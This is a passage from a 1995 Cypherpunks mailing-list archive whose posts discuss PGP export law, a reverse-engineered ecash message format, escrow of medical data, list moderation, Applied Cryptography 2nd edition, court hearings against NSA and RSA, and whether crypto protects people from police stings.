     * Chapter Seven contrasts the Mesh, and the Net.
       
     * The Epilogue considers certain reasons why information 
technology
       may not translate into the victory of the Small and the 
Many over
       the Few and the Large.
       
-----

<www.ndu.edu/ndu/inss> and links offer an ape-lab of global 
insecurity ebolas.








From x93ojg at juliet.stfx.ca  Wed Nov 22 18:17:46 1995
From: x93ojg at juliet.stfx.ca (Still)
Date: Thu, 23 Nov 1995 10:17:46 +0800
Subject: PGP in Canada
In-Reply-To: <Pine.3.89.9511222044.B25201-0100000@tesla.cc.uottawa.ca>
Message-ID: <Pine.A32.3.91.951122213807.121948C@juliet.stfx.ca>


I think people may have misunderstood me.  I am able to get PGP, I just 
want to know if it is legal for me to do so as I want to install it on a 
network and am not a big fan of jail.  It would do serious things to my 
future in the Canadian military.  All I wan't to know quite simply is "Is 
it legal for me to ftp a copy of PGP.  The MIT site says that it is OK as 
long as I am exprting it to Canada for use on a machine in Canada.  
Although other sites say that it is not permitted to be exported to Canada.
 

--

	     T H E  M A N , T H E  M Y T H , T H E  L E G E N D . 
******************************************************************************
* Dylan "Still" Boudreau	* Knowledge is proud that she knows so much; *
* Internet: x93ojg at stfx.ca	* Wisdom is humble that she knows no more.   *
******************************************************************************
*       Homepage: http://juliet.stfx.ca/people/stu/x93ojg/welcome.html       *  
******************************************************************************

		When someone says, "That's a good question." 
		 You can be sure it's a lot better than the 
		         answer you're going to get.







From iagoldbe at calum.csclub.uwaterloo.ca  Wed Nov 22 18:23:39 1995
From: iagoldbe at calum.csclub.uwaterloo.ca (Ian Goldberg)
Date: Thu, 23 Nov 1995 10:23:39 +0800
Subject: ecash protocol: Part 1
In-Reply-To: <199511212146.NAA11456@cory.EECS.Berkeley.EDU>
Message-ID: <490jct$11k@calum.csclub.uwaterloo.ca>


In article <199511230103.RAA15911 at jobe.shell.portal.com>,
Hal  <hfinney at shell.portal.com> wrote:
>Ian Goldberg <iang at cory.EECS.Berkeley.EDU> writes:
>
>>Last week, I was taking a look at the ecash protocol (no, I don't have a copy;
>>I have a binary, which I can't even run...).  
>
>>I've managed to decipher a useful bit of the first message sent from
>>the shop to the payer.  It's the Payment Request, and contains the following
>>information:
>
>>o Header identifying packet as Payment Request
>>o The integer 4
>>o The payment amount, in cents
>>o The time (seconds since 1970)
>>o The integer 79
>>o The name of the shop (payee)
>>o A description of the item being paid for
>>o An empty string
>>o The integer 0
>>o End of Record marker
>
>That's very interesting work!  What are the string formats, are they null
>terminated or Pascal-style with a preceding count byte?  How did you
>identify "an empty string", wouldn't that just be a byte of 0?  How did
>you know it was an empty string rather than just a 0.

See below.

>Did you get this by inducing a shop to send a payment request message to
>some program you wrote which was listening on the ecash port?

Yup.  I just had a program sitting on the ecash port that hexdumped
anything fed to it.  That, and a copy of the binary to read...

>I wonder if it would be legal to write shop software which sent such a
>payment request, took the resulting coins, and deposited them in the bank
>(if we could figure out all the protocols necessary).  This particular
>sequence of operations would not appear to infringe anybody's patents -
>there are no blinding operations involved.  It's not clear how useful
>such a program would be but at least it would be one step away from the
>DigiCash monopoly.

 From what I gathered from Doug's posts a little while back, the _client_
stuff is perfectly fine; only the _bank_ stuff is Chaum-patented.

Here are the messy byte-details:

The data encoding:
---
Header:  2 bytes

0xa0 0x80+type

where type is:

0x12: Payment Request
0x0a: Payment
0x29: Length of Message
0x13: Dummy Message
(there are others)
---
EOR: 1 byte

0xa1

End of Record indicator
---
n-byte Integer:

0x90 0x80+n followed by n bytes of data, MSB first

n should probably be 1 <= n <= 4.
---
Date: 4 bytes

0x91 0x84 followed by 4 bytes of time since 1970
---
String:

0x92 0x80+(length) followed by (length) bytes
---
Data:

0x94 0x80+(length) followed by (length) bytes
---
There are other types, like 0x93 (Multi-precision integer) that I
haven't decoded yet.

=====

The first message from the shop:

a0b9 9083 0000 37a1                         # ......7.

a092 9081 0490 810a 9184 30ad 1930 9081     # ..........0..0..
4f92 8c65 7368 6f70 4063 322e 6f72 6792     # O..eshop at c2.org.
9063 6769 2d62 696e 2f64 6f72 656d 6169     # .cgi-bin/doremai
6c92 8090 8100 a1                           # l......

What it means:

a0b9: Header (Message length)
9083 000037: integer = 0x37 (length of following message)
a1: EOR

a092: Header (Payment Request)
9081 04: integer = 4
9081 0a: integer = 10 (cost in cents)
9184 30ad1930: time
9081 4f: integer = 79
928c "eshop at c2.org" : string (payee)
9290 "cgi-bin/doremail" : string (description)
9280 : empty string
9081 00: integer = 0
a1: EOR

   - Ian





From adam at lighthouse.homeport.org  Thu Nov 23 08:54:47 1995
From: adam at lighthouse.homeport.org (Adam Shostack)
Date: Fri, 24 Nov 1995 00:54:47 +0800
Subject: MED_vac
In-Reply-To: <199511222108.QAA10547@universe.digex.net>
Message-ID: <199511231641.LAA07272@homeport.org>


Scott Brickner wrote:

| "Thomas M. Swiss" writes:
| >     A (possibly stupid) thought: could commercial key escrow help here?
| >
| >     I very much want hospitals to have fast access to my medical data if
| >my broken and bleeding body should come through their door, even if I am
| >unconscious and my personal physician cannot be reached. On the other hand,
| >I don't want anyone to be snooping through them right now.
| 
| Actually, Bell Labs outlines a system which can preserve anonymity
| under these circumstances in "The Use of Communications Networks to
| Increase Personal Privacy In a Health Insurance Architecture" at
| <URL:ftp://ftp.research.att.com/dist/anoncc/privacy.health.ps.Z>.
| 
| It's based on their anonymous credit card protocol, which is really a
| sort of identity escrow service managed by a remailer.  You might find
| it interesting.

	Maximchuck's anon credit card system depends to a huge degree
on fast, highly available remailers, but he makes no provisions for
funding them.  He suggested at a talk I attended that the Federal
Reserve could operate the one remailer that his system would use to
protect your privacy.

	Other than that, its an interesting system which uses no
public key crypto for mostly anonymous transactions.

Adam
-- 
"It is seldom that liberty of any kind is lost all at once."
					               -Hume






From lharrison at mhv.net  Thu Nov 23 08:58:36 1995
From: lharrison at mhv.net (Lynne L. Harrison)
Date: Fri, 24 Nov 1995 00:58:36 +0800
Subject: PROPOSAL: cypherpunks-news@toad.com? (was: rand-test)
Message-ID: <9511231639.AA25523@mhv.net>


<snip>
>I am inclined to agree with Perry in as much as the volume of posts to
>the cypherpunks list is greatly increased by reposts of news from
>other mailing lists, USENET newsgroups, WWW sources, newspapers, TV
>programs, films, books, talks, etc.  While some of the information
>posted is interesting, and relevant, some others are less relevant,
>bordering on noise.
>
>The proposal: a separate list for current-event reports/news/reposts.

1.  Creating a separate list, IMHO, will not stop cross-posts to the list.
People will merely add one more list to their "cc" line.

2.  More importantly, I am troubled with the "this is OUR list" attitude
that some people have expressed.  Yes, it is a pain when their are
cross-posts that are completely off-topic but, as Adam correctly points out,
some are interesting and relevant.
    One of the tenets proposed by those on this list is free speech.  Most
of us are on more than one list, so I'm assuming that most of us receive
100+ messages a day.  It is irritating to read something that's been crossed
to c|punks that has nothing to do with this list.  However, it only takes a
few seconds to arrive at that conclusion and trash the post.
    The "they are targeting this list" borders almost on paranoia.  While
some paranoia is healthy :) - it should not lead to the cry to ban posts
that have been *deemed* to be inappropriate.
    I find it interesting that those who express that the net should be a
community where expression is to be encouraged and defended - until the time
arrives when such "unsolicited/unwanted/offensive/irrelevant" expression
knocks on one's front door.

Regards -
  Lynne


*******************************************************
Lynne L. Harrison, Esq.   |     "The key to life:
Poughkeepsie, New York    |      - Get up;
E-mail:                   |      - Survive;
lharrison at mhv.net         |      - Go to bed."
*******************************************************






From perry at piermont.com  Thu Nov 23 09:56:42 1995
From: perry at piermont.com (Perry E. Metzger)
Date: Fri, 24 Nov 1995 01:56:42 +0800
Subject: Applied Crypto 2nd Ed.
Message-ID: <199511231725.MAA24475@jekyll.piermont.com>



I'm surprised no one has been giving their review of Applied
Cryptography, 2nd. Ed., AKA The Bible.

I have little time for a formal review -- my copy, purchased directly
from Bruce (I encourage people to buy straight from him -- he deserves
to get the cash!) only arrived a couple of days ago. Its an amazing
piece of work. He's outdone the 1st Edition by a large stretch, which
I wouldn't have thought possible. I've bought the hardcover -- I'll be
opening it up over and over again, I figure...

Perry





From gnu at toad.com  Thu Nov 23 10:13:02 1995
From: gnu at toad.com (John Gilmore)
Date: Fri, 24 Nov 1995 02:13:02 +0800
Subject: Two 'punky court hearings: Dec 6th, SF and San Jose
Message-ID: <9511231746.AA16675@toad.com>


At 9AM on December 6 in San Francisco, the 9th District Court of Appeals
will finally hear the appeal of my original FOIA case against NSA.

At 10AM on December 6 in San Jose, Roger Schlafly's case against RSA Data
Security will hold a hearing on the validity of the Diffie-Hellman,
Hellman-Merkle, RSA, and Schnorr patents.

Mark your calendar!

My hearing is the first (and probably only) oral arguments to the
Court of Appeals.  The overall issue is whether NSA is violating the
law by deliberately taking six months to three years to handle
ordinary FOIA requests.  (And what can/will the courts do about it.)
The specific issue that we appealed on is whether the lower-court
judge in the case has the discretion to throw out a case in which the
government is violating the law, without addressing the problem.

The legal theory is that since the courts are peoples' only recourse
when the government violates its own laws, the court system can't
simply ignore the problem.  This would mean that the people have NO
recourse against a despotic government (except armed or nonviolent
rebellion, which is a terrible solution).

There are lots of other ramifications, since NSA has built up a
formidible wall of nit-picky procedural defenses.  Since the judges
will steer the oral hearing, I don't know whether they'll focus on the
big issue or the gritty details.  I'll work on getting some of the
briefs online.

This case (CA No. 94-16165) is NOT at the Federal Building; the Court
of Appeals is at 121 Spear Street (2 Rincon Center), 4th Floor,
Courtroom 2, 9AM.  I think Rincon Center is the old Post Office at
Mission and Spear Streets.  Spear is "0th Street", downtown between
the Bay and 1st Street.

It probably won't be as much fun as the Bernstein hearings.  But if we
win (here and in a few other hearings), it could pry NSA open to
public accountability.  And this would go a long way toward making
some real progress in the crypto policy debate.  We might actually get
to see the other side's concerns!

If you come, wear a "good clothes" costume.

If I wasn't going to be at my own hearing, I'd be at Roger's.  He has
sued RSA and PKP in the hope of overturning their patents, which they
have been wielding like a club over anyone trying to make progress in
public-key cryptography.  (RSA's idea of reasonable and
non-discriminatory licensing is "How much money do you have?").
Though some companies have disputed RSA's patents, nobody has ever
made a court determine whether the patents are really valid.  Roger
aims to fill that gap.

You may even get to see Jim Bidzos ooze through the courtroom.  In an
earlier hearing in the Schlafly case, Jim claimed that Roger had
insufficient honesty and character because he had held a joint talk
with *me* at Crypto '94 about our respective lawsuits.  Jim described
me to the court as an avowed destroyer of intellectual property
rights, and strongly implied that I had unlawfully revealed their
valuable RC4 trade secret.  It ain't so, on any level, and if he says
something like it again, I want lots of witnesses.

10AM, San Jose federal court, Judge Williams' courtroom.  I hope Roger
will post more details, access info for the legal documents in the
case, and directions to the building.

	John Gilmore






From mtwain at netcom.com  Thu Nov 23 10:21:40 1995
From: mtwain at netcom.com (Mark Twain Ecash Support)
Date: Fri, 24 Nov 1995 02:21:40 +0800
Subject: ecash protocol: Part 1
Message-ID: <199511231755.JAA02492@netcom15.netcom.com>


> I know ecash has some proxy support
> but I'm not sure how it works.  There are SOCKS proxies and http proxies,
> and I don't know which it uses.  I used a logging httpd proxy to derive
> the data for the SSL challenges I did this past summer.  It might be
> interesting to post the binary data from some ecash transactions.

The Ecash firewall support works by sending the messages as multipart 
MIME messages. The browser is then set to hand the application/ecash 
message the Ecash front end.

> I wonder if it would be legal to write shop software which sent such a
> payment request, took the resulting coins, and deposited them in the bank
> (if we could figure out all the protocols necessary). 

IANAL. What would you hope to gain from creating such a piece of 
software?

--Lucky at

-- Mark Twain Ecash Support
   <mailto:support at marktwain.com>
   <http://www.marktwain.com/ecash.html>





From iagoldbe at calum.csclub.uwaterloo.ca  Thu Nov 23 10:40:39 1995
From: iagoldbe at calum.csclub.uwaterloo.ca (Ian Goldberg)
Date: Fri, 24 Nov 1995 02:40:39 +0800
Subject: ecash protocol: Part 1
In-Reply-To: <v02120d05acd986f50e5e@[199.2.22.120]>
Message-ID: <492e1i$smd@calum.csclub.uwaterloo.ca>


In article <v02120d05acd986f50e5e@[199.2.22.120]>,
Douglas Barnes <cman at communities.com> wrote:
>
>> From what I gathered from Doug's posts a little while back, the _client_
>>stuff is perfectly fine; only the _bank_ stuff is Chaum-patented.
>>
>
>This is exactly backwards. Also, it is entirely possible that they
>have structured the protocol to make sure that both sides have to
>practice some element of Digicash intellectual property. What I
>said was "it is possible to create an anonymous digital cash system
>where the bank does not infringe and the client can optionally
>infringe or not infringe (sacrificing anonymity)."
>
>(See: http://www.communities.com/paper/agnostic.html)
>
>

Yes.  D'oh.  I realized this while talking to Dave shortly after I posted.
All the bank does is send back the cube root of what it received from the
client.  If the client wants to multiply by the cube of a random number
before sending to the bank, and dividing by that random number after,
that's up to it.  The system Hal mentioned, though (client sends payment
requests, receives payments, deposits them), still doesn't infringe,
as long as it doesn't do _withdrawls_.

   - Ian "Hoping he hasn't goofed up again..."





From perry at piermont.com  Thu Nov 23 11:01:43 1995
From: perry at piermont.com (Perry E. Metzger)
Date: Fri, 24 Nov 1995 03:01:43 +0800
Subject: crypto for porno users
In-Reply-To: <199511230817.AAA22826@you.got.net>
Message-ID: <199511231839.NAA24795@jekyll.piermont.com>



Jay Campbell writes:
> A common way to get around prostitution sting operations is to ask the lady
> to expose sensitive portions of her anatomy to prove her sincerity before
> the would-be customer commits to any transactions; this sort of thing is
> also becoming commonplace on the net for pornography or pirated software,
> too.

Except that government agents have mailed people kiddie porn as parts
of stings. I wonder if decoy cops will expose themselves, too.

All these urban myths about undercover police are amusing but quite
useless. Yes, cops can lie about if they are cops. Yes, they can do
all sorts of things.

Perry





From iagoldbe at calum.csclub.uwaterloo.ca  Thu Nov 23 11:04:26 1995
From: iagoldbe at calum.csclub.uwaterloo.ca (Ian Goldberg)
Date: Fri, 24 Nov 1995 03:04:26 +0800
Subject: ecash protocol: Part 1
In-Reply-To: <199511231755.JAA02492@netcom15.netcom.com>
Message-ID: <492fha$1um@calum.csclub.uwaterloo.ca>


In article <199511231755.JAA02492 at netcom15.netcom.com>,
Mark Twain Ecash Support <support at marktwain.com> wrote:
>> I wonder if it would be legal to write shop software which sent such a
>> payment request, took the resulting coins, and deposited them in the bank
>> (if we could figure out all the protocols necessary). 
>
>IANAL. What would you hope to gain from creating such a piece of 
>software?
>
A piece of ecash software which does not violate Chaumian patents, does
something useful, and for which we have _source_...

   - Ian "Speaking of which..."





From dlv at bwalk.dm.com  Thu Nov 23 11:47:47 1995
From: dlv at bwalk.dm.com (Dr. Dimitri Vulis)
Date: Fri, 24 Nov 1995 03:47:47 +0800
Subject: Java & Netscape security [NOISE]
In-Reply-To: <9511231357.AA10766@all.net>
Message-ID: <Pa01eD16w165w@bwalk.dm.com>


fc at all.net (Dr. Frederick B. Cohen) writes:
> This is not correct, at least according to legal precident.  If someone who
> is from Sun representes themselves as being from Sun (i.e., a Sun.Com email
> address in their signature line), then when they speak (or email) about Sun,
> its products, its policies, etc., they represent Sun.

Yes. On the positite side, the readers are likely to take more seriously
someone who's known to work for the company whose products he's discussing.
E.g., if someone writes from Netcom about Java, and I happen to know that he
works for Sun (even in a totally unrelated division), I'll suspect that he may
know more about Sun products than someone whose affiliation I don't know, and
I'll pay a little more attention to his writings.

The periodic Usenet post _What is Usenet? A second opinion_ by Edward Vielmetti
<emv at msen.com> says:

]- Disclaimers are worthless.  If you post from foobar.com, and put a note
]  on the bottom "not the opinions of foobar inc.,", you may satisfy the
]  lawyers but your corporate reputation still will be affected.  To maintain
]  a separate net.identity, post from a different site.

I agree that disclaimers are worthless. I don't agree that they would satisfy
the lawyers.

---

Dr. Dimitri Vulis
Brighton Beach Boardwalk BBS, Forest Hills, N.Y.: +1-718-261-2013, 14.4Kbps





From perry at piermont.com  Thu Nov 23 11:56:44 1995
From: perry at piermont.com (Perry E. Metzger)
Date: Fri, 24 Nov 1995 03:56:44 +0800
Subject: How to order Applied Crypto direct from Bruce Schneier
Message-ID: <199511231937.OAA24938@jekyll.piermont.com>



Several people have asked for this. You might want to email him to ask
if the offer is still open, since this was a while back.

From: Bruce Schneier <schneier at winternet.com>
Subject: Applied Cryptography, 2nd Edition: Ordering Information
Date: Sun, 17 Sep 1995 18:09:34 -0500 (CDT)

The SECOND EDITION of APPLIED CRYPTOGRAPHY is coming in November. 
This is a major rewrite: 50% more words, 7 more chapters, and
over 1600 references.  Not only did I make corrections to the
first edition and add developments since it was published, but I
also included topics left out of the first edition.  (See table
of contents--attached.)

The second edition has lots of new algorithms (including GOST,
Blowfish, RC4, and A5), more information on the Clipper Chip and
key escrow, dozens of new protocols, more information on how PGP
works, detailed information on key management and modes of
operation, and new source code.

The second edition will be published in paperback and hardcover. 
Right now I am making both available at a 15% discount.

*****************************************************************
                          ORDER FORM

Applied Cryptography, 2nd Edition (Hardcover): $70 * .85 = $59.00
Applied Cryptography, 2nd Edition (Softcover): $50 * .85 = $42.00

          Shipping:
                    Air (U.S.):       $5 per book
                    Surface (U.S.):   $3 per book
                    Canada/Mexico:    $7 per book
                    Everywhere else:  $9 per book

Send to:

          Counterpane Systems, 101 E Minnehaha Parkway,
                    Minneapolis, MN  55419

I need payment by check, in U.S. funds drawn on a U.S. bank.  Or a
postal money order.  Sorry, no credit cards.
*****************************************************************

              APPLIED CRYPTOGRAPHY, SECOND EDITION
                       Table of Contents

((Sections in all capitals are either new or substantially
rewritten.))

Forward by Whitfield Diffie

Preface

Chapter 1:  Foundations
          Terminology; STEGANOGRAPHY; Substitution Ciphers and
          Transposition Ciphers; Simple XOR; One-Time Pads; Computer
          Algorithms; Large Numbers

Part I:  Cryptographic Protocols

Chapter 2:  Protocol Building Blocks
          Introduction to Protocols; Communications using Symmetric
          Cryptography; One-Way Functions; One-Way Hash Functions;
          Communications using Public-Key Cryptography; Digital
          Signatures; Digital Signatures with Encryption; Random and
          Pseudo-Random Sequence Generation

Chapter 3:  Basic Protocols
          Key Exchange; Authentication; AUTHENTICATION AND KEY
          EXCHANGE; FORMAL ANALYSIS OF AUTHENTICATION AND KEY-EXCHANGE
          PROTOCOLS; Multiple-Key Public-Key Cryptography; Secret
          Splitting; Secret Sharing; Cryptographic Protection of
          Databases

Chapter 4:  Intermediate Protocols
          Timestamping Services; Subliminal Channel; Undeniable
          Digital Signatures; DESIGNATED CONFIRMER SIGNATURES; PROXY
          SIGNATURES; Group Signatures; Fail-Stop Digital Signatures;
          Computing with Encrypted Data; Bit Commitment; Fair Coin
          Flips; Mental Poker; ONE-WAY ACCUMULATORS; All-or-Nothing
          Disclosure of Secrets; KEY ESCROW

Chapter 5:  Advanced Protocols
          ZERO-KNOWLEDGE PROOFS; Zero-Knowledge Proofs of Identity;
          Blind Signatures; IDENTITY-BASED PUBLIC-KEY CRYPTOGRAPHY;
          Oblivious Transfer; OBLIVIOUS SIGNATURES; Simultaneous
          Contract Signing; Digital Certified Mail; Simultaneous
          Exchange of Secrets

Chapter 6:  Esoteric Protocols
          SECURE ELECTIONS; Secure Multiparty Computation; Anonymous
          Message Broadcast; DIGITAL CASH

Part II:  Cryptographic Techniques

Chapter 7:  Key Length
          SYMMETRIC KEY LENGTH; PUBLIC-KEY KEY LENGTH; COMPARING
          SYMMETRIC AND PUBLIC-KEY KEY LENGTH; BIRTHDAY ATTACKS
          AGAINST ONE-WAY HASH FUNCTIONS; How Long Should a Key Be?;
          Caveat Emptor

Chapter 8:  Key Management
          Generating Keys; NONLINEAR KEYSPACES; Transferring Keys;
          Verifying Keys; Using Keys; UPDATING KEYS; Storing Keys;
          Backup Keys; Compromised Keys; Lifetime of Keys; Destroying
          Keys; Public-Key Key Management

Chapter 9:  Algorithm Types and Modes
          Electronic Codebook Mode; Block Replay; Cipher Block
          Chaining Mode; Stream Ciphers; Self-Synchronizing Stream
          Ciphers; Cipher-Feedback Mode; Synchronous Stream Ciphers;
          Output-Feedback Mode; Counter Mode; Other Block-Cipher
          Modes; CHOOSING A CIPHER MODE; INTERLEAVING; Block Ciphers
          vs. Stream Ciphers

Chapter 10:  Using Algorithms
          Choosing an Algorithm; Public-Key Cryptography vs. Symmetric
          Cryptography; Encrypting Communications Channels; ENCRYPTING
          DATA FOR STORAGE; Hardware Encryption vs. Software
          Encryption; COMPRESSION, ENCODING, AND ENCRYPTION; DETECTING
          ENCRYPTION; HIDING CIPHERTEXT IN CIPHERTEXT; DESTROYING
          INFORMATION

Part III:  Cryptographic Algorithms

Chapter 11:  Mathematical Background
          Information Theory; Complexity Theory; NUMBER THEORY;
          FACTORING; Prime Number Generation; Discrete Logarithms in a
          Finite Field

Chapter 12:  Data Encryption Standard
          Background; Description of DES; Security of DES; 
          DIFFERENTIAL AND LINEAR CRYPTANALYSIS; THE REAL DESIGN
          CRITERIA; DES VARIANTS; HOW SECURE IS DES TODAY?

Chapter 13:  Other Block Algorithms
          Lucifer; Madryga; Newdes; Feal-N; Redoc; LOKI; Khufu and
          Khafre; RC2; Idea; Mmb; CA-1.1; SKIPJACK

Chapter 14:  Still Other Block Algorithms
          GOST; CAST; BLOWFISH; SAFER K-64; 3-WAY; CRAB; SXAL8/MBAL;
          RC5; OTHER BLOCK ALGORITHMS; THEORY OF BLOCK CIPHER DESIGN;
          USING ONE-WAY HASH FUNCTIONS; CHOOSING A BLOCK ALGORITHM

Chapter 15:  Combining Block Algorithms
          DOUBLE ENCRYPTION; TRIPLE ENCRYPTION; DOUBLING THE BLOCK
          LENGTH; OTHER MULTIPLE ENCRYPTION SCHEMES; CDMF KEY
          SHORTENING; WHITENING; CASCADING MULTIPLE BLOCK ALGORITHMS;
          COMBINING MULTIPLE BLOCK ALGORITHMS

Chapter 16:  Pseudo-Random-Sequence Generators and Stream Ciphers
          Linear Congruential Generators; Linear Feedback Shift
          Registers; LFSRs in Software; DESIGN AND ANALYSIS OF STREAM
          CIPHERS; Stream Ciphers using LFSRs; A5; HUGHES XPD/KPD;
          NANOTEQ; RAMBUTAN; ADDITIVE GENERATORS; GIFFORD; ALGORITHM
          M; PKZIP

Chapter 17:  Other Stream Ciphers and Real Random-Sequence Generators
          RC4; SEAL; WAKE; FEEDBACK WITH CARRY SHIFT REGISTERS; STREAM
          CIPHERS USING FCSRS; NONLINEAR FEEDBACK SHIFT REGISTERS; 
          Other Stream Ciphers; System-Theoretic Approach to Stream
          Cipher Design; Complexity-Theoretic Approach to Stream
          Cipher Design; Other Approaches to Stream Cipher Design;
          CASCADING MULTIPLE STREAM CIPHERS;  CHOOSING A STREAM
          CIPHER; GENERATING MULTIPLE STREAMS FROM A SINGLE PSEUDO-
          RANDOM SEQUENCE GENERATOR; REAL RANDOM-SEQUENCE GENERATORS

Chapter 18:  One-Way Hash Functions
          Background; Snefru; N-HASH; MD4; MD5; MD2; Secure Hash
          Algorithm (SHA); RIPE-MD; Haval; Other One-Way Hash
          Functions; ONE-WAY HASH FUNCTIONS USING SYMMETRIC BLOCK
          ALGORITHMS; Using Public-key Algorithms; CHOOSING A ONE-WAY
          HASH FUNCTION; MESSAGE AUTHENTICATION CODES

Chapter 19:  Public-Key Algorithms
          Background; Knapsack Algorithms; RSA; Pohlig-Hellman; Rabin;
          ElGamal; McEliece; Elliptic Curve Cryptosystems; LUC; FINITE
          AUTOMATON PUBLIC-KEY CRYPTOSYSTEMS

Chapter 20:  Public-Key Digital Signature Algorithms
          Digital Signature Algorithm (DSA); DSA VARIANTS; GOST
          DIGITAL SIGNATURE ALGORITHM; DISCRETE LOGARITHM SIGNATURE
          SCHEMES; Ong-Schnorr-Shamir; Esign; Cellular Automata; Other
          Public-Key Algorithms

Chapter 21:  Identification Schemes
          Feige-Fiat-Shamir; Guillou-Quisquater; Schnorr; CONVERTING
          IDENTIFICATION SCHEMES TO SIGNATURE SCHEMES

Chapter 22:  Key-Exchange Algorithms
          DIFFIE-HELLMAN; STATION-TO-STATION PROTOCOL; Shamir's Three-
          Pass Protocol; COMSET; Encrypted Key Exchange; FORTIFIED KEY
          NEGOTIATION; Conference Key Distribution and Secret
          Broadcasting

Chapter 23:  Special Algorithms for Protocols
          Multiple-Key Public-Key Cryptography; Secret Sharing
          Algorithms; Subliminal Channel; Undeniable Digital
          Signatures; DESIGNATED CONFIRMER SIGNATURES; Computing with
          Encrypted Data; Fair Coin Flips; ONE-WAY ACCUMULATORS; All-
          or-Nothing Disclosure of Secrets; FAIR AND FAILSAFE
          CRYPTOSYSTEMS; Zero-Knowledge Proofs of Knowledge; Blind
          Signatures; Oblivious Transfer; Secure Multiparty
          Computation; Probabilistic Encryption; Quantum Cryptography

Part IV:  The Real World

Chapter 24:  Example Implementations
          IBM Secret-Key Management Protocol; Mitrenet; ISDN; STU-III;
          Kerberos; KryptoKnight; SESAME; IBM COMMON CRYPTOGRAPHIC
          ARCHITECTURE; ISO Authentication Framework; Privacy-Enhanced
          Mail (PEM); Message Security Protocol; PRETTY GOOD PRIVACY
          (PGP); SMART CARDS; PUBLIC-KEY CRYPTOGRAPHY STANDARDS;
          UNIVERSAL ELECTRONIC PAYMENT SYSTEM; CLIPPER; CAPSTONE; AT&T
          MODEL 3600 TELEPHONE SECURITY DEVICE

Chapter 25:  Politics
          NATIONAL SECURITY AGENCY; National Computer Security Center;
          National Institute of Standards and Technology; RSA Data
          Security, Inc.; PUBLIC KEY PARTNERS; International
          Association for Cryptologic Research; RACE Integrity
          Primitives Evaluation; CONDITIONAL ACCESS FOR EUROPE;
          ISO/IEC 9979; PROFESSIONAL, CIVIL LIBERTIES, AND INDUSTRY
          GROUPS; Sci.Crypt; CYPHERPUNKS; Patents; U.S. EXPORT RULES;
          FOREIGN IMPORT AND EXPORT OF CRYPTOGRAPHY; Legal Issues

AFTERWARD BY MATT BLAZE

Source Code
          DES; LOKI91; IDEA; GOST; BLOWFISH; 3-WAY; RC5; A5; SEAL;
          WAKE

References






From cme at clark.net  Thu Nov 23 12:04:10 1995
From: cme at clark.net (Carl Ellison)
Date: Fri, 24 Nov 1995 04:04:10 +0800
Subject: crypto for porno users
Message-ID: <199511231945.OAA03659@clark.net>


Hi Jay.

>Date: Thu, 23 Nov 1995 00:17:47 -0800
>From: Jay Campbell <edge at got.net>
>Subject: Re: crypto for porno users


>A law
>enforcement team would be stepping onto shaky ground if they were forced to
>transfer illegal images/etc to a suspected trafficer before getting evidence
>from him. Entrapment is an ugly concept.

We've been hearing about such things (using the mails) for some time.  I
don't know how the cops avoided entrapment when they posed as kiddie porn
customers or pedophiles when they were doing the AOL sting.

>>3. Encryption of porn would work against the kind of porn distribution
>>	found on the alt.binary.pictures.erotic... newsgroups.  Encryption
>>	requires that recipients be identified.
>
>Not at all .. a porn distributor could generate a key pair, use part A to
>encode the images, and dessiminate part B thru a variety of outlets -
>publicly posted, sold, passed thru an informal network of like-minded
>netizens...

It's that informal network which is the danger to the pornographer.  The
bigger the network, the closer to certainty that it's been infiltrated.

<begin major soap box issue for me>

Strong authentication via crypto does not create a trusted group.  Trust is
a human:human decision -- subject to severe flaws, none of which are solved
by crypto.  [Can you devise a crypto protocol which will prevent or even
just detect adultery, for example?]  With each additional person, there is
a probability of deception.  For this informal network of yours, deception
by any one participant constitutes a security failure.  If you want to
avoid that, therefore, you need to keep the group *very small*.  If it's
that small, then it's not that interesting a target for LE.

<end major soap box issue for me>

>I would argue the exact opposite - strong crypto would tend to minimize the
>effective take, since there's no guarantee that /anything/ on a perp's
>system will be in the clear. I'll let someone else with a better background
>pound on the 'brute force' section.

Ah -- but that's the point I was making.  Crypto gives the appearance of
security -- whether it's in the informal network or with file storage.
It's often a bank vault door on a cardboard house.  For much of what people
do, especially if there's a large net, it's not rational to expect to
achieve security.  But -- if people have done something to achieve
security, they're likely to be fooled into trusting it to be adequate.

Meanwhile, if *everything* on the perp's machine is encrypted, you're
probably in good shape.  That means he'll be required to type passwords too
often -- so he'll either pick a small one or have some machinery which
stores the password.  Both give cryptanalytic advantages.

This isn't a guarantee that *every* perp will be wide open.  Some won't be.
It means that a bunch of perps will be wide open (out of their own
carelessness -- like the breaks into the Enigma net).

The question you need to look at is not the control-freak question which
Freeh seems concerned with:

A)	the probability that some one perp will manage to hide his data

but rather the SIGINT question:

B)	the expected percentage of perps who will fail to hide their data

Have a good day.

 - Carl




 +--------------------------------------------------------------------------+
 |Carl M. Ellison    cme at acm.org    http://www.clark.net/pub/cme            |
 |PGP: E0414C79B5AF36750217BC1A57386478 & 61E2DE7FCB9D7984E9C8048BA63221A2  |
 |  ``Officer, officer, arrest that man!  He's whistling a dirty song.''    |
 +---------------------------------------------- Jean Ellison (aka Mother) -+





From attila at primenet.com  Thu Nov 23 12:10:30 1995
From: attila at primenet.com (attila)
Date: Fri, 24 Nov 1995 04:10:30 +0800
Subject: PROPOSAL: cypherpunks-news@toad.com? (was: rand-test)
In-Reply-To: <9511231639.AA25523@mhv.net>
Message-ID: <Pine.BSD.3.91.951123191604.11385D-100000@usr6.primenet.com>


On Thu, 23 Nov 1995, Lynne L. Harrison wrote:

> <snip>
> >I am inclined to agree with Perry in as much as the volume of posts to
> >the cypherpunks list is greatly increased by reposts of news from
> >other mailing lists, USENET newsgroups, WWW sources, newspapers, TV
> >programs, films, books, talks, etc.  While some of the information
> >posted is interesting, and relevant, some others are less relevant,
> >bordering on noise.
> >
> >The proposal: a separate list for current-event reports/news/reposts.
>
	<attila> someone suggested a new list --moderated. My concern, so
circulated, is that whoever (including backups to cover vacations and 
travel) accepts the responsibility must not thrash any of the code posts. 
My suggestion for making the list effective is to always post to c|punks, 
even if you are on the code list which means "cypherpunks" is still the 
same; who ever is doing the moderating then forwards all the code threads 
to "cypherpunks.moderated"  --you get the best of both worlds.
 
> 1.  Creating a separate list, IMHO, will not stop cross-posts to the list.
> People will merely add one more list to their "cc" line.
>
    	<attila> no doubt. for instance, whoever put c|punks on the 
    ACLUNATL at aol.com biweekly list would just hit both and that one cannot
    be unsubscribed except by the original subscriber. however, that one is
    concise -let's hope we do not get hit with "digitaliberty," "VTW" or any
    of the rest of the prolific slammers/day. 

    	the issue as pointed out above is a separate moderated and 
    non-postable list.
 
> 2.  More importantly, I am troubled with the "this is OUR list" attitude
